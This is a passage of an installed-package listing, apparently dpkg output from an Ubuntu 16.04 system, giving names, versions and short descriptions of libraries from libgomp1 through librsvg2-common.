libgomp1:amd64 5.4.0-6ubuntu1~16.04.5 GCC OpenMP (GOMP) support library
libgpg-error0:amd64 1.21-2ubuntu1 library for common error values and messages in GnuPG components
libgpgme11:amd64 1.6.0-1 GPGME - GnuPG Made Easy (library)
libgphoto2-6:amd64 2.5.9-3 gphoto2 digital camera library
libgphoto2-l10n 2.5.9-3 gphoto2 digital camera library - localized messages
libgphoto2-port12:amd64 2.5.9-3 gphoto2 digital camera port library
libgpm2:amd64 1.20.4-6.1 General Purpose Mouse - shared library
libgpod-common 0.8.3-6ubuntu2 common files for libgpod
libgpod4:amd64 0.8.3-6ubuntu2 library to read and write songs and artwork to an iPod
libgrail6 3.1.0+16.04.20160125-0ubuntu1 Gesture Recognition And Instantiation Library
libgraphite2-3:amd64 1.3.10-0ubuntu0.16.04.1 Font rendering engine for Complex Scripts -- library
libgrilo-0.2-1:amd64 0.2.15-1 Framework for discovering and browsing media - Shared libraries
libgs9:amd64 9.18~dfsg~0-0ubuntu2.7 interpreter for the PostScript language and for PDF - Library
libgs9-common 9.18~dfsg~0-0ubuntu2.7 interpreter for the PostScript language and for PDF - common files
libgsettings-qt1:amd64 0.1+16.04.20160329-0ubuntu1 Library to access GSettings from Qt
libgssapi-krb5-2:amd64 1.13.2+dfsg-5ubuntu2 MIT Kerberos runtime libraries - krb5 GSS-API Mechanism
libgssapi3-heimdal:amd64 1.7~git20150920+dfsg-4ubuntu1.16.04.1 Heimdal Kerberos - GSSAPI support library
libgstreamer-plugins-base1.0-0:amd64 1.8.3-1ubuntu0.2 GStreamer libraries from the "base" set
libgstreamer-plugins-good1.0-0:amd64 1.8.3-1ubuntu0.4 GStreamer development files for libraries from the "good" set
libgstreamer1.0-0:amd64 1.8.3-1~ubuntu0.1 Core GStreamer libraries and elements
libgtk-3-0:amd64 3.18.9-1ubuntu3.3 GTK+ graphical user interface library
libgtk-3-bin 3.18.9-1ubuntu3.3 programs for the GTK+ graphical user interface library
libgtk-3-common 3.18.9-1ubuntu3.3 common files for the GTK+ graphical user interface library
libgtk2-perl 2:1.2498-1 Perl interface to the 2.x series of the Gimp Toolkit library
libgtk2.0-0:amd64 2.24.30-1ubuntu1.16.04.2 GTK+ graphical user interface library
libgtk2.0-bin 2.24.30-1ubuntu1.16.04.2 programs for the GTK+ graphical user interface library
libgtk2.0-common 2.24.30-1ubuntu1.16.04.2 common files for the GTK+ graphical user interface library
libgtkmm-3.0-1v5:amd64 3.18.0-1 C++ wrappers for GTK+ (shared libraries)
libgtksourceview-3.0-1:amd64 3.18.2-1 shared libraries for the GTK+ syntax highlighting widget
libgtksourceview-3.0-common 3.18.2-1 common files for the GTK+ syntax highlighting widget
libgtkspell3-3-0:amd64 3.0.7-2 spell-checking addon for GTK+'s TextView widget
libgtop-2.0-10:amd64 2.32.0-1 gtop system monitoring library (shared)
libgtop2-common 2.32.0-1 gtop system monitoring library (common)
libgucharmap-2-90-7:amd64 1:3.18.2-1ubuntu1 Unicode browser widget library (shared library)
libgudev-1.0-0:amd64 1:230-2 GObject-based wrapper library for libudev
libgusb2:amd64 0.2.9-0ubuntu1 GLib wrapper around libusb1
libgutenprint2 5.2.11-1 runtime for the Gutenprint printer driver library
libgweather-3-6:amd64 3.18.2-0ubuntu0.1 GWeather shared library
libgweather-common 3.18.2-0ubuntu0.1 GWeather common files
libgxps2:amd64 0.2.3.2-1 handling and rendering XPS documents (library)
libhardware2 0.1.0+git20151016+6d424c9-0ubuntu7 Library to provide access to the Android libhardware HAL
libharfbuzz-icu0:amd64 1.0.1-1ubuntu0.1 OpenType text shaping engine ICU backend
libharfbuzz0b:amd64 1.0.1-1ubuntu0.1 OpenType text shaping engine (shared library)
libhcrypto4-heimdal:amd64 1.7~git20150920+dfsg-4ubuntu1.16.04.1 Heimdal Kerberos - crypto library
libheimbase1-heimdal:amd64 1.7~git20150920+dfsg-4ubuntu1.16.04.1 Heimdal Kerberos - Base library
libheimntlm0-heimdal:amd64 1.7~git20150920+dfsg-4ubuntu1.16.04.1 Heimdal Kerberos - NTLM support library
libhogweed4:amd64 3.2-1ubuntu0.16.04.1 low level cryptographic library (public-key cryptos)
libhpmud0:amd64 3.16.3+repack0-1 HP Multi-Point Transport Driver (hpmud) run-time libraries
libhtml-form-perl 6.03-1 module that represents an HTML form element
libhtml-format-perl 2.11-2 module for transforming HTML into various formats
libhtml-parser-perl 3.72-1 collection of modules that parse HTML text documents
libhtml-tagset-perl 3.20-2 Data tables pertaining to HTML
libhtml-template-perl 2.95-2 module for using HTML templates with Perl
libhtml-tree-perl 5.03-2 Perl module to represent and create HTML syntax trees
libhttp-cookies-perl 6.01-1 HTTP cookie jars
libhttp-daemon-perl 6.01-1 simple http server class
libhttp-date-perl 6.02-1 module of date conversion routines
libhttp-message-perl 6.11-1 perl interface to HTTP style messages
libhttp-negotiate-perl 6.00-2 implementation of content negotiation
libhud2:amd64 14.10+16.04.20160415-0ubuntu1 library for exporting items to the Unity HUD
libhunspell-1.3-0:amd64 1.3.3-4ubuntu1 spell checker and morphological analyzer (shared library)
libhx509-5-heimdal:amd64 1.7~git20150920+dfsg-4ubuntu1.16.04.1 Heimdal Kerberos - X509 support library
libhybris 0.1.0+git20151016+6d424c9-0ubuntu7 Allows to run bionic-based HW adaptations in glibc systems - libs
libhybris-common1 0.1.0+git20151016+6d424c9-0ubuntu7 Common library that contains the Android linker and custom hooks
libhyphen0:amd64 2.8.8-2ubuntu1 ALTLinux hyphenation library - shared library
libibus-1.0-5:amd64 1.5.11-1ubuntu2 Intelligent Input Bus - shared library
libical1a:amd64 1.0.1-0ubuntu2 iCalendar library implementation in C (runtime)
libice6:amd64 2:1.0.9-1 X11 Inter-Client Exchange library
libicu55:amd64 55.1-7ubuntu0.3 International Components for Unicode
libidn11:amd64 1.32-3ubuntu1.2 GNU Libidn library, implementation of IETF IDN specifications
libido3-0.1-0:amd64 13.10.0+16.04.20161028-0ubuntu1 Shared library providing extra gtk menu items for display in
libiec61883-0:amd64 1.2.0-0.2 an partial implementation of IEC 61883
libieee1284-3:amd64 0.2.11-12 cross-platform library for parallel port access
libijs-0.35:amd64 0.35-12 IJS raster image transport protocol: shared library
libilmbase12:amd64 2.2.0-11ubuntu2 several utility libraries from ILM used by OpenEXR
libimobiledevice6:amd64 1.2.0+dfsg-3~ubuntu0.2 Library for communicating with the iPhone and iPod Touch
libindicator3-7 12.10.2+16.04.20151208-0ubuntu1 panel indicator applet - shared library
libinput-bin 1.6.3-1ubuntu1~16.04.1 input device management and event handling library - udev quirks
libinput10:amd64 1.6.3-1ubuntu1~16.04.1 input device management and event handling library - shared library
libio-html-perl 1.001-1 open an HTML file with automatic charset detection
libio-pty-perl 1:1.08-1.1build1 Perl module for pseudo tty IO
libio-socket-inet6-perl 2.72-2 object interface for AF_INET6 domain sockets
libio-socket-ssl-perl 2.024-1 Perl module implementing object oriented interface to SSL sockets
libio-string-perl 1.08-3 Emulate IO::File interface for in-core strings
libipc-run-perl 0.94-1 Perl module for running processes
libipc-system-simple-perl 1.25-3 Perl module to run commands simply, with detailed diagnostics
libisc-export160 1:9.10.3.dfsg.P4-8ubuntu1.8 Exported ISC Shared Library
libisc160:amd64 1:9.10.3.dfsg.P4-8ubuntu1.8 ISC Shared Library used by BIND
libisccc140:amd64 1:9.10.3.dfsg.P4-8ubuntu1.8 Command Channel Library used by BIND
libisccfg140:amd64 1:9.10.3.dfsg.P4-8ubuntu1.8 Config File Handling Library used by BIND
libisl15:amd64 0.16.1-1 manipulating sets and relations of integer points bounded by linear constraints
libitm1:amd64 5.4.0-6ubuntu1~16.04.5 GNU Transactional Memory Library
libiw30:amd64 30~pre9-8ubuntu1 Wireless tools - library
libjack-jackd2-0:amd64 1.9.10+20150825git1ed50c92~dfsg-1ubuntu1 JACK Audio Connection Kit (libraries)
libjasper1:amd64 1.900.1-debian1-2.4ubuntu1.1 JasPer JPEG-2000 runtime library
libjavascriptcoregtk-4.0-18:amd64 2.18.0-0ubuntu0.16.04.2 JavaScript engine library from WebKitGTK+
libjbig0:amd64 2.1-3.1 JBIGkit libraries
libjbig2dec0 0.12+20150918-1ubuntu0.1 JBIG2 decoder library - shared libraries
libjpeg-turbo8:amd64 1.4.2-0ubuntu3 IJG JPEG compliant runtime library.
libjpeg8:amd64 8c-2ubuntu8 Independent JPEG Group's JPEG runtime library (dependency package)
libjson-c2:amd64 0.11-4ubuntu2 JSON manipulation library - shared library
libjson-glib-1.0-0:amd64 1.1.2-0ubuntu1 GLib JSON manipulation library
libjson-glib-1.0-common 1.1.2-0ubuntu1 GLib JSON manipulation library (common files)
libk5crypto3:amd64 1.13.2+dfsg-5ubuntu2 MIT Kerberos runtime libraries - Crypto Library
libkeyutils1:amd64 1.5.9-8ubuntu1 Linux Key Management Utilities (library)
libklibc 2.0.4-8ubuntu1.16.04.3 minimal libc subset for use with initramfs
libkmod2:amd64 22-1ubuntu5 libkmod shared library
libkpathsea6:amd64 2015.20160222.37495-1 TeX Live: path search library for TeX (runtime part)
libkrb5-26-heimdal:amd64 1.7~git20150920+dfsg-4ubuntu1.16.04.1 Heimdal Kerberos - libraries
libkrb5-3:amd64 1.13.2+dfsg-5ubuntu2 MIT Kerberos runtime libraries
libkrb5support0:amd64 1.13.2+dfsg-5ubuntu2 MIT Kerberos runtime libraries - Support library
libksba8:amd64 1.3.3-1ubuntu0.16.04.1 X.509 and CMS support library
liblangtag-common 0.5.7-2ubuntu1 library to access tags for identifying languages -- data
liblangtag1:amd64 0.5.7-2ubuntu1 library to access tags for identifying languages
liblcms2-2:amd64 2.6-3ubuntu2 Little CMS 2 color management library
liblcms2-utils 2.6-3ubuntu2 Little CMS 2 color management library (utilities)
libldap-2.4-2:amd64 2.4.42+dfsg-2ubuntu3.2 OpenLDAP libraries
libldb1:amd64 2:1.1.24-1ubuntu3 LDAP-like embedded database - shared library
liblightdm-gobject-1-0:amd64 1.18.3-0ubuntu1.1 LightDM GObject client library
liblircclient0:amd64 0.9.0-0ubuntu6 infra-red remote control support - client library
liblist-moreutils-perl 0.413-1build1 Perl module with additional list functions not found in List::Util
libllvm3.8:amd64 1:3.8-2ubuntu4 Modular compiler and toolchain technologies, runtime library
libllvm4.0:amd64 1:4.0-1ubuntu1~16.04.2 Modular compiler and toolchain technologies, runtime library
liblocale-gettext-perl 1.07-1build1 module using libc functions for internationalization in Perl
liblouis-data 2.6.4-2ubuntu0.1 Braille translation library - data
liblouis9:amd64 2.6.4-2ubuntu0.1 Braille translation library - shared libs
liblouisutdml-bin 2.5.0-3 Braille UTDML translation utilities
liblouisutdml-data 2.5.0-3 Braille UTDML translation library - data
liblouisutdml6:amd64 2.5.0-3 Braille UTDML translation library - shared libs
liblqr-1-0:amd64 0.4.2-2 converts plain array images into multi-size representation
liblsan0:amd64 5.4.0-6ubuntu1~16.04.5 LeakSanitizer -- a memory leak detector (runtime)
libltdl7:amd64 2.4.6-0.1 System independent dlopen wrapper for GNU libtool
liblua5.1-0:amd64 5.1.5-8ubuntu1 Shared library for the Lua interpreter version 5.1
liblua5.2-0:amd64 5.2.4-1ubuntu1 Shared library for the Lua interpreter version 5.2
liblwp-mediatypes-perl 6.02-1 module to guess media type for a file or a URL
liblwp-protocol-https-perl 6.06-2 HTTPS driver for LWP::UserAgent
liblwres141:amd64 1:9.10.3.dfsg.P4-8ubuntu1.8 Lightweight Resolver Library used by BIND
liblz4-1:amd64 0.0~r131-2ubuntu2 Fast LZ compression algorithm library - runtime
liblzma5:amd64 5.1.1alpha+20120614-2ubuntu2 XZ-format compression library
liblzo2-2:amd64 2.08-1.2 data compression library
libmagic1:amd64 1:5.25-2ubuntu1 File type determination library using "magic" numbers
libmagickcore-6.q16-2:amd64 8:6.8.9.9-7ubuntu5.9 low-level image manipulation library -- quantum depth Q16
libmagickcore-6.q16-2-extra:amd64 8:6.8.9.9-7ubuntu5.9 low-level image manipulation library - extra codecs (Q16)
libmagickwand-6.q16-2:amd64 8:6.8.9.9-7ubuntu5.9 image manipulation library
libmailtools-perl 2.13-1 Manipulate email in perl programs
libmbim-glib4:amd64 1.12.2-2ubuntu1 Support library to use the MBIM protocol
libmbim-proxy 1.12.2-2ubuntu1 Proxy to communicate with MBIM ports
libmedia1 0.1.0+git20151016+6d424c9-0ubuntu7 Library to provide access to the Android Media HAL
libmediaart-2.0-0:amd64 1.9.0-2 media art extraction and cache management library
libmessaging-menu0:amd64 13.10.1+15.10.20150505-0ubuntu1 Messaging Menu - shared library
libmetacity-private3a:amd64 1:3.18.7-0ubuntu0.3 library for the Metacity window manager
libmhash2:amd64 0.9.9.9-7 Library for cryptographic hashing and message authentication
libminiupnpc10:amd64 1.9.20140610-2ubuntu2.16.04.1 UPnP IGD client lightweight library
libmirclient9:amd64 0.26.3+16.04.20170605-0ubuntu1.1 Display server for Ubuntu - client library
libmircommon5:amd64 0.21.0+16.04.20160330-0ubuntu1 Display server for Ubuntu - shared library
libmircommon7:amd64 0.26.3+16.04.20170605-0ubuntu1.1 Display server for Ubuntu - shared library
libmircore1:amd64 0.26.3+16.04.20170605-0ubuntu1.1 Display server for Ubuntu - shared library
libmirprotobuf3:amd64 0.26.3+16.04.20170605-0ubuntu1.1 Display server for Ubuntu - RPC definitions
libmm-glib0:amd64 1.4.12-1ubuntu1 D-Bus service for managing modems - shared libraries
libmng2:amd64 2.0.2-0ubuntu3 Multiple-image Network Graphics library
libmnl0:amd64 1.0.3-5 minimalistic Netlink communication library
libmount1:amd64 2.27.1-6ubuntu3.3 device mounting library
libmpc3:amd64 1.0.3-1 multiple precision complex floating-point library
libmpdec2:amd64 2.4.2-1 library for decimal floating point arithmetic (runtime library)
libmpfr4:amd64 3.1.4-1 multiple precision floating-point computation
libmpx0:amd64 5.4.0-6ubuntu1~16.04.5 Intel memory protection extensions (runtime)
libmspub-0.1-1:amd64 0.1.2-2ubuntu1 library for parsing the mspub file structure
libmtdev1:amd64 1.1.5-1ubuntu2 Multitouch Protocol Translation Library - shared library
libmtp-common 1.1.10-2ubuntu1 Media Transfer Protocol (MTP) common files
libmtp-runtime 1.1.10-2ubuntu1 Media Transfer Protocol (MTP) runtime tools
libmtp9:amd64 1.1.10-2ubuntu1 Media Transfer Protocol (MTP) library
libmwaw-0.3-3:amd64 0.3.7-1ubuntu2.1 import library for some old Mac text documents
libmythes-1.2-0:amd64 2:1.2.4-1ubuntu3 simple thesaurus library
libnatpmp1:amd64 20110808-4 portable and fully compliant implementation of NAT-PMP
libnautilus-extension1a:amd64 1:3.18.4.is.3.14.3-0ubuntu6 libraries for nautilus components - runtime version
libncurses5:amd64 6.0+20160213-1ubuntu1 shared libraries for terminal handling
libncursesw5:amd64 6.0+20160213-1ubuntu1 shared libraries for terminal handling (wide character support)
libndp0:amd64 1.4-2ubuntu0.16.04.1 Library for Neighbor Discovery Protocol
libneon27-gnutls:amd64 0.30.1-3build1 HTTP and WebDAV client library (GnuTLS enabled)
libnet-dbus-perl 1.1.0-3build1 Perl extension for the DBus bindings
libnet-dns-perl 0.81-2build1 Perform DNS queries from a Perl script
libnet-domain-tld-perl 1.73-1 list of currently available Top-level Domains (TLDs)
libnet-http-perl 6.09-1 module providing low-level HTTP connection client
libnet-ip-perl 1.26-1 Perl extension for manipulating IPv4/IPv6 addresses
libnet-libidn-perl 0.12.ds-2build2 Perl bindings for GNU Libidn
libnet-smtp-ssl-perl 1.03-1 Perl module providing SSL support to Net::SMTP
libnet-ssleay-perl 1.72-1build1 Perl module for Secure Sockets Layer (SSL)
libnetfilter-conntrack3:amd64 1.0.5-1 Netfilter netlink-conntrack library
libnetpbm10 2:10.0-15.3 Graphics conversion tools shared libraries
libnettle6:amd64 3.2-1ubuntu0.16.04.1 low level cryptographic library (symmetric and one-way cryptos)
libnewt0.52:amd64 0.52.18-1ubuntu2 Not Erik's Windowing Toolkit - text mode windowing with slang
libnfnetlink0:amd64 1.0.1-3 Netfilter netlink library
libnih-dbus1:amd64 1.0.3-4.3ubuntu1 NIH D-Bus Bindings Library
libnih1:amd64 1.0.3-4.3ubuntu1 NIH Utility Library
libnl-3-200:amd64 3.2.27-1ubuntu0.16.04.1 library for dealing with netlink sockets
libnl-genl-3-200:amd64 3.2.27-1ubuntu0.16.04.1 library for dealing with netlink sockets - generic netlink
libnm-glib-vpn1:amd64 1.2.6-0ubuntu0.16.04.1 network management framework (GLib VPN shared library)
libnm-glib4:amd64 1.2.6-0ubuntu0.16.04.1 network management framework (GLib shared library)
libnm-gtk-common 1.2.6-0ubuntu0.16.04.4 library for wireless and mobile dialogs - common files
libnm-gtk0:amd64 1.2.6-0ubuntu0.16.04.4 library for wireless and mobile dialogs (libnm-glib version)
libnm-util2:amd64 1.2.6-0ubuntu0.16.04.1 network management framework (shared library)
libnm0:amd64 1.2.6-0ubuntu0.16.04.1 GObject-based client library for NetworkManager
libnma-common 1.2.6-0ubuntu0.16.04.4 library for wireless and mobile dialogs - common files
libnma0:amd64 1.2.6-0ubuntu0.16.04.4 library for wireless and mobile dialogs (libnm version)
libnotify-bin 0.7.6-2svn1 sends desktop notifications to a notification daemon (Utilities)
libnotify4:amd64 0.7.6-2svn1 sends desktop notifications to a notification daemon
libnpth0:amd64 1.2-3 replacement for GNU Pth using system threads
libnspr4:amd64 2:4.13.1-0ubuntu0.16.04.1 NetScape Portable Runtime Library
libnss-mdns:amd64 0.10-7 NSS module for Multicast DNS name resolution
libnss3:amd64 2:3.28.4-0ubuntu0.16.04.3 Network Security Service libraries
libnss3-nssdb 2:3.28.4-0ubuntu0.16.04.3 Network Security Security libraries - shared databases
libnuma1:amd64 2.0.11-1ubuntu1 Libraries for controlling NUMA policy
libnux-4.0-0 4.0.8+16.04.20160705-0ubuntu1 Visual rendering toolkit for real-time applications - shared lib
libnux-4.0-common 4.0.8+16.04.20160705-0ubuntu1 Visual rendering toolkit for real-time applications - common files
liboauth0:amd64 1.0.3-0ubuntu2 C library for implementing OAuth 1.0
libodfgen-0.1-1 0.1.6-1ubuntu2 library to generate ODF documents
libogg0:amd64 1.3.2-1 Ogg bitstream library
libopenexr22:amd64 2.2.0-10ubuntu2 runtime files for the OpenEXR image library
libopus0:amd64 1.1.2-1ubuntu1 Opus codec runtime library
liborc-0.4-0:amd64 1:0.4.25-1 Library of Optimized Inner Loops Runtime Compiler
liborcus-0.10-0v5:amd64 0.9.2-4ubuntu2 library for processing spreadsheet documents
liboxideqt-qmlplugin:amd64 1.21.5-0ubuntu0.16.04.1 Web browser engine for Qt (QML plugin)
liboxideqtcore0:amd64 1.21.5-0ubuntu0.16.04.1 Web browser engine for Qt (core library and components)
liboxideqtquick0:amd64 1.21.5-0ubuntu0.16.04.1 Web browser engine for Qt (QtQuick library)
libp11-kit-gnome-keyring:amd64 3.18.3-0ubuntu2 GNOME keyring module for the PKCS#11 module loading library
libp11-kit0:amd64 0.23.2-5~ubuntu16.04.1 library for loading and coordinating access to PKCS#11 modules - runtime
libpackagekit-glib2-16:amd64 0.8.17-4ubuntu6~gcc5.4ubuntu1.2 Library for accessing PackageKit using GLib
libpagemaker-0.0-0:amd64 0.0.3-1ubuntu1 Library for importing and converting PageMaker Documents
libpam-gnome-keyring:amd64 3.18.3-0ubuntu2 PAM module to unlock the GNOME keyring upon login
libpam-modules:amd64 1.1.8-3.2ubuntu2 Pluggable Authentication Modules for PAM
libpam-modules-bin 1.1.8-3.2ubuntu2 Pluggable Authentication Modules for PAM - helper binaries
libpam-runtime 1.1.8-3.2ubuntu2 Runtime support for the PAM library
libpam-systemd:amd64 229-4ubuntu21 system and service manager - PAM module
libpam0g:amd64 1.1.8-3.2ubuntu2 Pluggable Authentication Modules library
libpango-1.0-0:amd64 1.38.1-1 Layout and rendering of internationalized text
libpango-perl 1.227-1 Perl module to layout and render international text
libpango1.0-0:amd64 1.38.1-1 Layout and rendering of internationalized text (transitional package)
libpangocairo-1.0-0:amd64 1.38.1-1 Layout and rendering of internationalized text
libpangoft2-1.0-0:amd64 1.38.1-1 Layout and rendering of internationalized text
libpangomm-1.4-1v5:amd64 2.38.1-1 C++ Wrapper for pango (shared libraries)
libpangox-1.0-0:amd64 0.0.2-5 pango library X backend
libpangoxft-1.0-0:amd64 1.38.1-1 Layout and rendering of internationalized text
libpaper-utils 1.1.24+nmu4ubuntu1 library for handling paper characteristics (utilities)
libpaper1:amd64 1.1.24+nmu4ubuntu1 library for handling paper characteristics
libparse-debianchangelog-perl 1.2.0-8 parse Debian changelogs and output them in other formats
libparted2:amd64 3.2-15 disk partition manipulator - shared library
libpcap0.8:amd64 1.7.4-2 system interface for user-level packet capture
libpci3:amd64 1:3.3.1-1.1ubuntu1.1 Linux PCI Utilities (shared library)
libpciaccess0:amd64 0.13.4-1 Generic PCI access library for X
libpcre16-3:amd64 2:8.38-3.1 Perl 5 Compatible Regular Expression Library - 16 bit runtime files
libpcre3:amd64 2:8.38-3.1 Perl 5 Compatible Regular Expression Library - runtime files
libpcsclite1:amd64 1.8.14-1ubuntu1.16.04.1 Middleware to access a smart card using PC/SC (library)
libpeas-1.0-0:amd64 1.16.0-1ubuntu2 Application plugin library
libpeas-1.0-0-python3loader 1.16.0-1ubuntu2 Application plugin library
libpeas-common 1.16.0-1ubuntu2 Application plugin library (common files)
libperl5.22:amd64 5.22.1-9ubuntu0.2 shared Perl library
libperlio-gzip-perl 0.19-1build1 module providing a PerlIO layer to gzip/gunzip
libpipeline1:amd64 1.4.1-2 pipeline manipulation library
libpixman-1-0:amd64 0.33.6-1 pixel-manipulation library for X and cairo
libplist3:amd64 1.12-3.1ubuntu0.16.04.1 Library for handling Apple binary and XML property lists
libplymouth4:amd64 0.9.2-3ubuntu13.2 graphical boot animation and logger - shared libraries
libpng12-0:amd64 1.2.54-1ubuntu1 PNG library - runtime
libpolkit-agent-1-0:amd64 0.105-14.1 PolicyKit Authentication Agent API
libpolkit-backend-1-0:amd64 0.105-14.1 PolicyKit backend API
libpolkit-gobject-1-0:amd64 0.105-14.1 PolicyKit Authorization API
libpoppler-glib8:amd64 0.41.0-0ubuntu1.5 PDF rendering library (GLib-based shared library)
libpoppler58:amd64 0.41.0-0ubuntu1.5 PDF rendering library
libpopt0:amd64 1.16-10 lib for parsing cmdline parameters
libportaudio2:amd64 19+svn20140130-1build1 Portable audio I/O - shared library
libprocps4:amd64 2:3.3.10-4ubuntu2.3 library for accessing process information from /proc
libprotobuf-lite9v5:amd64 2.6.1-1.3 protocol buffers C++ library (lite version)
libprotobuf9v5:amd64 2.6.1-1.3 protocol buffers C++ library
libproxy1-plugin-gsettings:amd64 0.4.11-5ubuntu1 automatic proxy configuration management library (GSettings plugin)
libproxy1-plugin-networkmanager:amd64 0.4.11-5ubuntu1 automatic proxy configuration management library (Network Manager plugin)
libproxy1v5:amd64 0.4.11-5ubuntu1 automatic proxy configuration management library (shared)
libpulse-mainloop-glib0:amd64 1:8.0-0ubuntu3.4 PulseAudio client libraries (glib support)
libpulse0:amd64 1:8.0-0ubuntu3.4 PulseAudio client libraries
libpulsedsp:amd64 1:8.0-0ubuntu3.4 PulseAudio OSS pre-load library
libpwquality-common 1.3.0-0ubuntu1 library for password quality checking and generation (data files)
libpwquality1:amd64 1.3.0-0ubuntu1 library for password quality checking and generation
libpython-stdlib:amd64 2.7.11-1 interactive high-level object-oriented language (default python version)
libpython2.7:amd64 2.7.12-1ubuntu0~16.04.1 Shared Python runtime library (version 2.7)
libpython2.7-minimal:amd64 2.7.12-1ubuntu0~16.04.1 Minimal subset of the Python language (version 2.7)
libpython2.7-stdlib:amd64 2.7.12-1ubuntu0~16.04.1 Interactive high-level object-oriented language (standard library, version 2.7)
libpython3-stdlib:amd64 3.5.1-3 interactive high-level object-oriented language (default python3 version)
libpython3.5:amd64 3.5.2-2ubuntu0~16.04.3 Shared Python runtime library (version 3.5)
libpython3.5-minimal:amd64 3.5.2-2ubuntu0~16.04.3 Minimal subset of the Python language (version 3.5)
libpython3.5-stdlib:amd64 3.5.2-2ubuntu0~16.04.3 Interactive high-level object-oriented language (standard library, version 3.5)
libqmi-glib1:amd64 1.12.6-1 Support library to use the Qualcomm MSM Interface (QMI) protocol
libqmi-proxy 1.12.6-1 Proxy to communicate with QMI ports
libqpdf17:amd64 6.0.0-2 runtime library for PDF transformation/inspection software
libqqwing2v5:amd64 1.3.4-1 tool for generating and solving Sudoku puzzles (library)
libqt4-dbus:amd64 4:4.8.7+dfsg-5ubuntu2 Qt 4 D-Bus module
libqt4-declarative:amd64 4:4.8.7+dfsg-5ubuntu2 Qt 4 Declarative module
libqt4-network:amd64 4:4.8.7+dfsg-5ubuntu2 Qt 4 network module
libqt4-script:amd64 4:4.8.7+dfsg-5ubuntu2 Qt 4 script module
libqt4-sql:amd64 4:4.8.7+dfsg-5ubuntu2 Qt 4 SQL module
libqt4-sql-sqlite:amd64 4:4.8.7+dfsg-5ubuntu2 Qt 4 SQLite 3 database driver
libqt4-xml:amd64 4:4.8.7+dfsg-5ubuntu2 Qt 4 XML module
libqt4-xmlpatterns:amd64 4:4.8.7+dfsg-5ubuntu2 Qt 4 XML patterns module
libqt5core5a:amd64 5.5.1+dfsg-16ubuntu7.5 Qt 5 core module
libqt5dbus5:amd64 5.5.1+dfsg-16ubuntu7.5 Qt 5 D-Bus module
libqt5feedback5:amd64 5.0~git20130529-0ubuntu13 Qt Feedback module
libqt5gui5:amd64 5.5.1+dfsg-16ubuntu7.5 Qt 5 GUI module
libqt5multimedia5:amd64 5.5.1-4ubuntu2 Qt 5 Multimedia module
libqt5network5:amd64 5.5.1+dfsg-16ubuntu7.5 Qt 5 network module
libqt5opengl5:amd64 5.5.1+dfsg-16ubuntu7.5 Qt 5 OpenGL module
libqt5organizer5:amd64 5.0~git20140515~29475884-0ubuntu20 Qt PIM module, Organizer library
libqt5positioning5:amd64 5.5.1-3ubuntu1 Qt Positioning module
libqt5printsupport5:amd64 5.5.1+dfsg-16ubuntu7.5 Qt 5 print support module
libqt5qml5:amd64 5.5.1-2ubuntu6 Qt 5 QML module
libqt5quick5:amd64 5.5.1-2ubuntu6 Qt 5 Quick library
libqt5quicktest5:amd64 5.5.1-2ubuntu6 Qt 5 Quick Test library
libqt5sql5:amd64 5.5.1+dfsg-16ubuntu7.5 Qt 5 SQL module
libqt5sql5-sqlite:amd64 5.5.1+dfsg-16ubuntu7.5 Qt 5 SQLite 3 database driver
libqt5svg5:amd64 5.5.1-2build1 Qt 5 SVG module
libqt5test5:amd64 5.5.1+dfsg-16ubuntu7.5 Qt 5 test module
libqt5webkit5:amd64 5.5.1+dfsg-2ubuntu1 Web content engine library for Qt
libqt5widgets5:amd64 5.5.1+dfsg-16ubuntu7.5 Qt 5 widgets module
libqt5xml5:amd64 5.5.1+dfsg-16ubuntu7.5 Qt 5 XML module
libqtcore4:amd64 4:4.8.7+dfsg-5ubuntu2 Qt 4 core module
libqtdbus4:amd64 4:4.8.7+dfsg-5ubuntu2 Qt 4 D-Bus module library
libqtgui4:amd64 4:4.8.7+dfsg-5ubuntu2 Qt 4 GUI module
libquadmath0:amd64 5.4.0-6ubuntu1~16.04.5 GCC Quad-Precision Math Library
libquvi-scripts 0.4.21-2 library for parsing video download links (Lua scripts)
libquvi7:amd64 0.4.1-3 library for parsing video download links (runtime libraries)
libraptor2-0:amd64 2.0.14-1 Raptor 2 RDF syntax library
librasqal3:amd64 0.9.32-1 Rasqal RDF query library
libraw1394-11:amd64 2.1.1-2 library for direct access to IEEE 1394 bus (aka FireWire)
libraw15:amd64 0.17.1-1 raw image decoder library
librdf0:amd64 1.0.17-1build1 Redland Resource Description Framework (RDF) library
libreadline6:amd64 6.3-8ubuntu2 GNU readline and history libraries, run-time libraries
libreoffice-avmedia-backend-gstreamer 1:5.1.6~rc2-0ubuntu1~xenial2 GStreamer backend for LibreOffice
libreoffice-base-core 1:5.1.6~rc2-0ubuntu1~xenial2 office productivity suite -- shared library
libreoffice-calc 1:5.1.6~rc2-0ubuntu1~xenial2 office productivity suite -- spreadsheet
libreoffice-common 1:5.1.6~rc2-0ubuntu1~xenial2 office productivity suite -- arch-independent files
libreoffice-core 1:5.1.6~rc2-0ubuntu1~xenial2 office productivity suite -- arch-dependent files
libreoffice-draw 1:5.1.6~rc2-0ubuntu1~xenial2 office productivity suite -- drawing
libreoffice-gnome 1:5.1.6~rc2-0ubuntu1~xenial2 office productivity suite -- GNOME integration
libreoffice-gtk 1:5.1.6~rc2-0ubuntu1~xenial2 office productivity suite -- GTK+ integration
libreoffice-help-en-us 1:5.1.4-0ubuntu1 office productivity suite -- English_american help
libreoffice-impress 1:5.1.6~rc2-0ubuntu1~xenial2 office productivity suite -- presentation
libreoffice-math 1:5.1.6~rc2-0ubuntu1~xenial2 office productivity suite -- equation editor
libreoffice-ogltrans 1:5.1.6~rc2-0ubuntu1~xenial2 LibreOffice Impress extension for slide transitions using OpenGL
libreoffice-pdfimport 1:5.1.6~rc2-0ubuntu1~xenial2 PDF Import component for LibreOffice
libreoffice-style-breeze 1:5.1.6~rc2-0ubuntu1~xenial2 office productivity suite -- Breeze symbol style
libreoffice-style-galaxy 1:5.1.6~rc2-0ubuntu1~xenial2 office productivity suite -- Galaxy (Default) symbol style
libreoffice-writer 1:5.1.6~rc2-0ubuntu1~xenial2 office productivity suite -- word processor
librest-0.7-0:amd64 0.7.93-1 REST service access library
librevenge-0.0-0:amd64 0.0.4-4ubuntu1 Base Library for writing document interface filters
librhythmbox-core9:amd64 3.3-1ubuntu7 support library for the rhythmbox music player
libroken18-heimdal:amd64 1.7~git20150920+dfsg-4ubuntu1.16.04.1 Heimdal Kerberos - roken support library
librsvg2-2:amd64 2.40.13-3 SAX-based renderer library for SVG files (runtime)
librsvg2-common:amd64 2.40.13-3 SAX-based renderer library for SVG files (extra runtime)
